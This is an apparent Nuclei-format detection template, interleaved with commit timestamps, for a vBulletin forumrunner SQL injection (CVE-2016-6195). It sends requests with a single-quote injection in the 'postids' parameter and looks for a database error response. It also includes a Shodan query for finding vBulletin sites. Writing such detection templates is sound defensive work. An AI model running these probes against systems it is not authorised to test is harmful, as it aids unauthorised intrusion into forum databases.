2023-05-31 00:41:32 +00:00
id : CVE-2016-6195
info :
2023-06-15 14:51:03 +00:00
name : vBulletin <= 4.2.3 - SQL Injection
2023-05-31 00:41:32 +00:00
author : MaStErChO
2023-07-11 19:49:27 +00:00
severity : critical
2023-05-31 00:41:32 +00:00
description : |
vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
reference :
- https://www.cvedetails.com/cve/CVE-2016-6195/
- https://www.exploit-db.com/exploits/38489
2023-05-31 00:46:57 +00:00
- https://enumerated.wordpress.com/2016/07/11/1/
2023-07-15 16:29:17 +00:00
- http://www.vbulletin.org/forum/showthread.php?t=322848
- https://github.com/drewlong/vbully
2023-05-31 00:41:32 +00:00
classification :
2023-05-31 01:03:01 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2016-6195
cwe-id : CWE-89
2023-07-11 19:49:27 +00:00
epss-score : 0.00284
cpe : cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
2023-06-15 14:50:15 +00:00
metadata :
2023-06-21 21:03:53 +00:00
max-request : 6
2023-06-15 14:50:15 +00:00
shodan-query : title:"Powered By vBulletin"
2023-06-21 21:03:53 +00:00
verified : "true"
2023-07-11 19:49:27 +00:00
vendor : vbulletin
product : vbulletin
2023-06-16 04:31:06 +00:00
tags : cve,cve2016,vbulletin,sqli,forum,edb
2023-05-31 00:41:32 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
2023-06-15 14:46:14 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2023-06-15 14:46:14 +00:00
matchers-condition : and
2023-05-31 00:41:32 +00:00
matchers :
- type : word
part : body
words :
- "type=dberror"
2023-06-15 14:46:14 +00:00
- type : status
status :
- 200
- 503
condition : or